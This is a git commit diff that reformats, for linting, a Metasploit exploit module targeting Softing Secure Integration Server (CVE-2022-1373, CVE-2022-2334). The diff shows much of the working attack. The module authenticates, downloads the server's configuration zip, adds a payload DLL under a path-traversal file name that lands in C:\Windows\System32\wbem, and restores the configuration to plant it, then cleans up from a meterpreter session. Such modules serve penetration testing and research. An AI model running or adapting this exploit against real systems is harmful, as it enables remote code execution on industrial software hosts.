Fix linting

ide0x90 · ide0x90 · commit c8b9b321a9f1 · 2024-04-13T18:22:20.000+08:00
diff --git a/modules/exploits/windows/http/softing_sis_rce.rb b/modules/exploits/windows/http/softing_sis_rce.rb
@@ -30,36 +30,32 @@ def initialize(info = {})
           A custom DLL can be provided to use in the exploit instead of using the default MSF-generated one. Refer to the module documentation for more details.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Chris Anastasio (muffin) of Incite Team', # discovery
-            'Steven Seeley (mr_me) of Incite Team', # discovery
-            'Imran E. Dawoodjee <imrandawoodjee.infosec[at]gmail.com', # msf module
-          ],
-        'References' =>
-          [
-            ['CVE', '2022-1373'],
-            ['CVE', '2022-2334'],
-            ['ZDI', '22-1154'],
-            ['ZDI', '22-1156'],
-            ['URL', 'https://industrial.softing.com/fileadmin/psirt/downloads/syt-2022-5.html'],
-            ['URL', 'https://ide0x90.github.io/softing-sis-122-rce/']
-          ],
-        'DefaultOptions' =>
-          {
-            'RPORT' => 8099,
-            'SSL' => false,
-            'EXITFUNC' => 'thread',
-            'WfsDelay' => 300
-          },
+        'Author' => [
+          'Chris Anastasio (muffin) of Incite Team', # discovery
+          'Steven Seeley (mr_me) of Incite Team', # discovery
+          'Imran E. Dawoodjee <imrandawoodjee.infosec[at]gmail.com', # msf module
+        ],
+        'References' => [
+          ['CVE', '2022-1373'],
+          ['CVE', '2022-2334'],
+          ['ZDI', '22-1154'],
+          ['ZDI', '22-1156'],
+          ['URL', 'https://industrial.softing.com/fileadmin/psirt/downloads/syt-2022-5.html'],
+          ['URL', 'https://ide0x90.github.io/softing-sis-122-rce/']
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 8099,
+          'SSL' => false,
+          'EXITFUNC' => 'thread',
+          'WfsDelay' => 300
+        },
         'Platform' => 'win',
         # the software itself only supports x64, see
         # https://industrial.softing.com/products/opc-opc-ua-software-platform/integration-platform/secure-integration-server.html
         'Arch' => [ARCH_X64],
-        'Targets' =>
-          [
-            [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
-          ],
+        'Targets' => [
+          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
+        ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2022-07-27',
         'Privileged' => true,
@@ -99,7 +95,7 @@ def checker_instance
       configure_http_login_scanner(
         host: datastore['RHOSTS'],
         port: datastore['RPORT'],
-        connection_timeout: 5,
+        connection_timeout: 5
       )
     ).dup
   end
@@ -128,7 +124,7 @@ def check
 
     # the vulnerabilities are to be fixed in version 1.30 according to the Softing advisory
     # so we will not continue if the version is not vulnerable
-    unless softing_version < Rex::Version.new("1.30")
+    unless softing_version < Rex::Version.new('1.30')
       return CheckCode::Safe
     end
 
@@ -137,19 +133,19 @@ def check
       print_status("#{peer} - Authenticating as user #{datastore['USERNAME']} with signature #{datastore['SIGNATURE']}...")
       # send a GET request to /runtime/core/user/<username>/authentication
       signature_check_res = signature_check(datastore['USERNAME'], datastore['SIGNATURE'])
-      
+
       # if we cannot connect at this point, we only know that the version is < 1.30
       # the system "appears" to be vulnerable
       unless signature_check_res
         print_error("#{peer} - Connection failed!")
       end
 
       # if the signature is correct, 200 OK is returned
-      unless signature_check_res.code == 200
-        print_error("#{peer} - Signature #{datastore['SIGNATURE']} is invalid for user #{datastore['USERNAME']}!")
-      else
+      if signature_check_res.code == 200
         print_good("#{peer} - Signature #{datastore['SIGNATURE']} is valid for user #{datastore['USERNAME']}")
         @signature = datastore['SIGNATURE']
+      else
+        print_error("#{peer} - Signature #{datastore['SIGNATURE']} is invalid for user #{datastore['USERNAME']}!")
       end
     # login with username and password
     else
@@ -165,10 +161,10 @@ def check
       end
 
       # if the signature is correct, 200 OK is returned
-      unless signature_check_res.code == 200
-        print_error("#{peer} - Invalid credentials!")
-      else
+      if signature_check_res.code == 200
         print_good("#{peer} - Valid credentials provided")
+      else
+        print_error("#{peer} - Invalid credentials!")
       end
     end
 
@@ -185,29 +181,29 @@ def exploit
     end
 
     # did the operator specify a custom DLL? If not...
-    unless datastore['DLLPATH']
+    if datastore['DLLPATH']
+      # otherwise, just use their provided DLL and assume they compiled everything correctly
+      # there is no way to check if it's compiled correctly anyway
+      dll_path = datastore['DLLPATH']
+    else
       # have MSF create the malicious DLL
       path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-2334')
       arch = target['Arch'] == ARCH_ANY ? payload.arch.first : target['Arch']
       datastore['EXE::Path'] = path
       datastore['EXE::Template'] = ::File.join(path, "template_#{arch}_windows.dll")
 
-      print_status("Generating payload DLL...")
+      print_status('Generating payload DLL...')
       dll = generate_payload_dll
-      dll_name = "wbemcomn.dll"
+      dll_name = 'wbemcomn.dll'
       dll_path = store_file(dll, dll_name)
       print_status("Created #{dll_path}")
-    else
-      # otherwise, just use their provided DLL and assume they compiled everything correctly
-      # there is no way to check if it's compiled correctly anyway
-      dll_path = datastore['DLLPATH']
     end
 
     # backup the Softing SIS configuration
     print_status("#{peer} - Saving configuration...")
     get_config_zip_res = send_request_cgi({
       'method' => 'GET',
-      'uri' => "/runtime/core/config-download",
+      'uri' => '/runtime/core/config-download',
       'vars_get' => {
         'User' => datastore['USERNAME'],
         'Signature' => @signature
@@ -240,13 +236,13 @@ def exploit
 
     # insert the malicious DLL
     Zip::File.open(config_zip_path, Zip::File::CREATE) do |zipfile|
-      zipfile.add("..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\wbem\\wbemcomn.dll", dll_path)
+      zipfile.add('..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\wbem\\wbemcomn.dll', dll_path)
     end
 
     # restore the configuration
     restore_config_res = send_request_cgi({
       'method' => 'PUT',
-      'uri' => "/runtime/core/config-restore",
+      'uri' => '/runtime/core/config-restore',
       'cookie' => "systemLang=en-US; lang=en; User=#{datastore['USERNAME']}; Signature=#{@signature}",
       'vars_get' => {
         'User' => datastore['USERNAME'],
@@ -269,25 +265,25 @@ def exploit
     end
 
     # if the exploit was successful, register the malicious wbemcomn.dll file for cleanup
-    register_file_for_cleanup("C:\\Windows\\System32\\wbem\\wbemcomn.dll")
+    register_file_for_cleanup('C:\\Windows\\System32\\wbem\\wbemcomn.dll')
   end
 
   # clean up the planted DLL if the session is meterpreter
   def on_new_session(session)
     if session.type != 'meterpreter'
-      print_error("Meterpreter not used. Please manually remove C:\\Windows\\System32\\wbem\\wbemcomn.dll")
+      print_error('Meterpreter not used. Please manually remove C:\\Windows\\System32\\wbem\\wbemcomn.dll')
       return
     end
 
     # load stdapi
-    session.core.use("stdapi") if not session.ext.aliases.include?("stdapi")
+    session.core.use('stdapi') if !session.ext.aliases.include?('stdapi')
 
     begin
-      files = session.fs.file.search("C:\\Windows\\System32\\wbem", "wbemcomn.dll")
-      files.each { |f|
-        print_warning("Deleting: #{f['path'] + "\\" + f['name']}")
-        session.fs.file.rm(f['path'] + "\\" + f['name'])
-      }
+      files = session.fs.file.search('C:\\Windows\\System32\\wbem', 'wbemcomn.dll')
+      files.each do |f|
+        print_warning("Deleting: #{f['path'] + '\\' + f['name']}")
+        session.fs.file.rm(f['path'] + '\\' + f['name'])
+      end
     rescue ::Exception => e
       print_error("Unable to delete - #{e}")
     end
@@ -308,12 +304,12 @@ def store_file(data, filename)
 
     fname = ::File.split(fname).last
 
-    fname.gsub!(/[^a-z0-9\.\_\-]+/i, '')
+    fname.gsub!(/[^a-z0-9._-]+/i, '')
     fname << ".#{ext}"
 
     path = File.join("#{Msf::Config.local_directory}/", fname)
     full_path = ::File.expand_path(path)
-    File.open(full_path, "wb") { |fd| fd.write(data) }
+    File.open(full_path, 'wb') { |fd| fd.write(data) }
 
     full_path.dup
   end
